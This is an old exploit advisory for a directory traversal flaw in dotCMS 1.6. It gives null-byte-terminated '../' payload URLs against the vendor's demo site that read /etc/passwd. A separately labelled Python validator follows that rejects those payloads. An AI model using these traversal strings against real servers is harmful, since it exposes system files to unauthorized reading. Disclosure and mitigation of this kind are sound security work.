dotCMS 1.6 id Multiple Local File Inclusion Vulnerabilities
Don 08/15/2008

++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ script:dotCMS
+ home: http://www.dotcms.org
+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
+ founder: Don of h4cky0u.org
+ Vulnerability: Directory traversal
++++++++++++++++++++++++++++++++++++++++++++++++++++++

exploit:
/index.dot?id=../../../../../../../../etc/passwd%00.jpg
/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

example:
http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html

solution:
Script should filter meta characters from user input.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-08-15]
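
Added example (not code from the advisory or from dotCMS): a Python validator for the "solution" line that goes beyond filtering meta characters by allowlisting the `id` value, rejecting a decoded NUL byte, and confirming the resolved path stays under the content root. `CONTENT_ROOT`, `SAFE_ID`, `RejectedId`, `resolve_content_id` and `verdict` are hypothetical names, and the way `id` maps to a file with an appended suffix is an assumption.

```python
import os
import re
from urllib.parse import unquote

CONTENT_ROOT = "/srv/cms/content"             # hypothetical content directory
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")  # allowlist instead of a denylist


class RejectedId(ValueError):
    """Raised when an id parameter must not be mapped to a file."""


def resolve_content_id(raw_id, suffix=".html", root=CONTENT_ROOT):
    """Map the raw query-string value of `id` to a file under root."""
    value = unquote(raw_id)  # one decode: %00 -> NUL, %2f -> "/"
    if "\x00" in value:
        # A NUL would cut off the suffix the application appends.
        raise RejectedId("NUL byte")
    if not SAFE_ID.fullmatch(value):
        # Covers "../", "\", "." and any "%" left by double encoding.
        raise RejectedId("characters outside allowlist")
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, value + suffix))
    # Defence in depth: a symlink inside root could still point elsewhere.
    if os.path.commonpath([root_real, target]) != root_real:
        raise RejectedId("escapes content root")
    return target


def verdict(raw_id):
    """Return 'accepted' or the rejection reason for one id value."""
    try:
        resolve_content_id(raw_id)
        return "accepted"
    except RejectedId as exc:
        return "rejected: " + str(exc)


if __name__ == "__main__":
    samples = [
        "news42",                                     # constructed, benign
        "../../../../../../../../etc/passwd%00.jpg",  # id value from the advisory
        "%252e%252e%252fetc%252fpasswd",              # constructed, double-encoded
    ]
    for s in samples:
        print(f"{s!r:50} {verdict(s)}")
```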